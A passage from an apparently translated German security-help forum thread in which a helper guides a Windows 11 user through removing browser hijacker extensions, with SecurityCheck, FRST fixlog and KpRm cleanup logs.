------------------------------- [ Imaging ] -------------------------------
GIMP 2.10.34-2 v.2.10.34 Warning! Download Update
-------------------------- [ IMAndCollaborate ] ---------------------------
Discord v.1.0.9023 Warning! Download Update
-------------------------------- [ Media ] --------------------------------
VLC media player v.3.0.20 Warning! Download Update
------------------------------- [ Browser ] -------------------------------
Opera GX Stable 109.0.5097.142 v.109.0.5097.142 Warning! Download Update
Brave v.127.1.68.128 [+]
Google Chrome v.127.0.6533.72 Warning! Download Update
Microsoft Edge v.126.0.2592.113
------------------ [ AntivirusFirewallProcessServices ] -------------------
Malwarebytes Service (MBAMService) - The service is running
C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe v.3.2.0.1306
Norton Security (NortonSecurity) - The service is running
C:\Program Files\Norton Security\Engine\22.24.2.6\NortonSecurity.exe v.17.2.3.65
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MsMpEng.exe v.4.18.24060.7
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\NisSrv.exe v.4.18.24060.7
Microsoft Defender Antivirus-Dienst (WinDefend) - The service is running
Microsoft Defender Antivirus-Netzwerkinspektionsdienst (WdNisSvc) - The service is running
---------------------------- [ UnwantedApps ] -----------------------------
Bonjour v.3.1.0.1 Warning! Application is distributed through the partnership programs and bundle assemblies. Uninstallation recommended. Possible you became a victim of fraud or social engineering.
Combo Cleaner v.1.0.63.0 << Hidden Warning! Suspected demo version of anti-spyware, driver updater or optimizer. If this program is not familiar to you it is recommended to uninstall it and execute PC scanning using Malwarebytes Anti-Malware. Possible you became a victim of fraud or social engineering. Computer experts no longer recommend this program.
----------------------------- [ End of Log ] ------------------------------ |
25.07.2024, 14:08 | #9 |
/// TB-Ausbilder | Windows 11: Policy in Edge and Chrome browsers cannot be disabled, loads Beautiful New Tab (Edge) and Qtr Search (Chrome) hijacker extension
Well done. A small entry left by the adware is still visible in Edge. We should quickly remove that as well... the repair only takes a moment.
Step 1 WARNING TO ALL READERS!!! This FRST script is intended exclusively for this user and should never be used 1:1 on another system!
Step 2 The following programs are outdated. You should uninstall them and install the latest version. You will find the download links in the SecurityCheck log file.
Please also update Microsoft Office, e.g. like this:
Removing the tools used: Run KpRm according to the illustrated instructions and then post the log file. Then we would be done! If you no longer have any problems with malware, we are finished here. Your log files are clean. If you like, you can say here whether you were satisfied with us and our help... Perhaps you would like to support the forum with a small donation. Finally, please be sure to read and implement the security measures: Note: Please give me brief feedback as soon as you have read the information linked above, everything is done and there are no more questions, so that I can remove this topic from my subscriptions. |
25.07.2024, 19:51 | #10 |
| Windows 11: Policy in Edge and Chrome browsers cannot be disabled, loads Beautiful New Tab (Edge) and Qtr Search (Chrome) hijacker extension Thanks for the help. FRST Log: Code:
ATTFilter Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 25.07.2024 durchgeführt von skysc (25-07-2024 20:39:42) Run:2 Gestartet von C:\Users\skysc\Downloads\Neuer Ordner Geladene Profile: skysc Start-Modus: Normal ============================================== fixlist Inhalt: ***************** Start:: CloseProcesses: Edge NewTab: Default -> Active:"chrome-extension://fepbfegljfpfclgajmjlmnhdillncgke/newtabHTML.html" Reboot: End:: ***************** Prozesse erfolgreich geschlossen. "NewTab" => nicht gefunden Das System musste neu gestartet werden. ==== Ende von Fixlog 20:39:43 ====
When I tried to update Microsoft Office, error code 30182-27 (53) came up. If you have any tips, please write. And here is the log from KpRm: Code:
ATTFilter # Run at 25.07.2024 20:48:53 # KpRm (Kernel-panik) version 2.17.0 # Website https://kernel-panik.me/tool/kprm/ # Run by skysc from C:\Users\skysc\AppData\Local\Temp\scoped_dir14852_1140157467 # Computer Name: SKYSGAMINGPC-CA # OS: Windows 11 X64 (22631) (10.0.22631.3880) # Number of passes: 1 - Checked options - ~ Delete Tools ~ Delete Quarantines - Delete Tools - ## AdwCleaner [OK] C:\Users\skysc\Downloads\adwcleaner (1).exe deleted [OK] C:\Users\skysc\Downloads\adwcleaner.exe deleted [OK] C:\AdwCleaner deleted ## FRST [OK] C:\Users\skysc\Desktop\Fixlog.txt deleted [OK] C:\Users\skysc\Downloads\Addition.txt deleted [OK] C:\Users\skysc\Downloads\FRST (1).txt deleted [OK] C:\Users\skysc\Downloads\FRST-OlderVersion deleted [OK] C:\Users\skysc\Downloads\FRST.txt deleted [OK] C:\Users\skysc\Downloads\Neuer Ordner\Addition.txt deleted [OK] C:\Users\skysc\Downloads\Neuer Ordner\Fixlog.txt deleted [OK] C:\Users\skysc\Downloads\Neuer Ordner\FRST-OlderVersion deleted [OK] C:\Users\skysc\Downloads\Neuer Ordner\FRST.txt deleted [OK] C:\Users\skysc\Downloads\Neuer Ordner\FRST64 (1).exe deleted [OK] C:\FRST deleted ## SecurityCheck [OK] C:\Users\skysc\Downloads\SecurityCheck.exe deleted [OK] C:\SecurityCheck deleted -- KPRM finished in 2.72s -- |
26.07.2024, 22:09 | #11 |
/// TB-Ausbilder | Windows 11: Policy in Edge and Chrome browsers cannot be disabled, loads Beautiful New Tab (Edge) and Qtr Search (Chrome) hijacker extension
Unfortunately, I can't help with the error code. We are glad that we could help. This topic appears to be resolved and will be removed from our subscriptions. Should you need the topic again, please send us a reminder including a link to the topic. Everyone else, please click here and create your own topic. |